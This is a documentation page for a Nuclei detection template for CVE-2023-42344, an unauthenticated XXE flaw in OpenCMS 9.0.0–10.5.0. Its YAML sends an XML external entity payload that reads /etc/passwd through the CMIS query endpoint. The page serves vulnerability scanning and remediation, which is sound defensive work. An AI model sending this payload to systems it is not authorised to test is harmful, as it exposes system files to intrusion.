Skip to content
Nuclei Templates

OpenCMS - XML external entity (XXE)

ID: CVE-2023-42344

Severity: high

Author: 0xr2r

Tags: cve,cve2023,xxe,opencms

Description

Section titled “Description”

users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.

YAML Source

Section titled “YAML Source”
id: CVE-2023-42344


info:
  name: OpenCMS - XML external entity (XXE)
  author: 0xr2r
  severity: high
  description: |
    users can execute code without authentication.  An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.
  remediation: Advised to upgrade to OpenCMS 10.5.1 or later to patch the vulnerability
  reference:
    - https://blog.qualys.com/product-tech/2023/12/08/opencms-unauthenticated-xxe-vulnerability-cve-2023-42344
    - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/
  classification:
    cpe: cpe:2.3:a:alkacon:opencms:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: alkacon
    product: opencms
    fofa-query: "OpenCms-9.5.3"
  tags: cve,cve2023,xxe,opencms


http:
  - method: POST
    path:
      - "{{BaseURL}}/opencms/cmisatom/cmis-online/query"
      - "{{BaseURL}}/cmisatom/cmis-online/query"


    headers:
      Content-Type: "application/xml;charset=UTF-8"
      Referer: "{{RootURL}}"


    body: |
      <?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis="<http://docs.oasis-open.org/ns/cmis/core/200908/>"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>
    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "invalidArgument"
        condition: and
# digest: 4a0a00473045022035af7dde829dcae18002f02bc97af968acec34c0ce3b7317f0ce2ef48cb61d51022100eb46935043ab2c1bfa5da913bc3c81e6f905c543e485ea61d3af6566f1802690:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-42344.yaml"

View on Github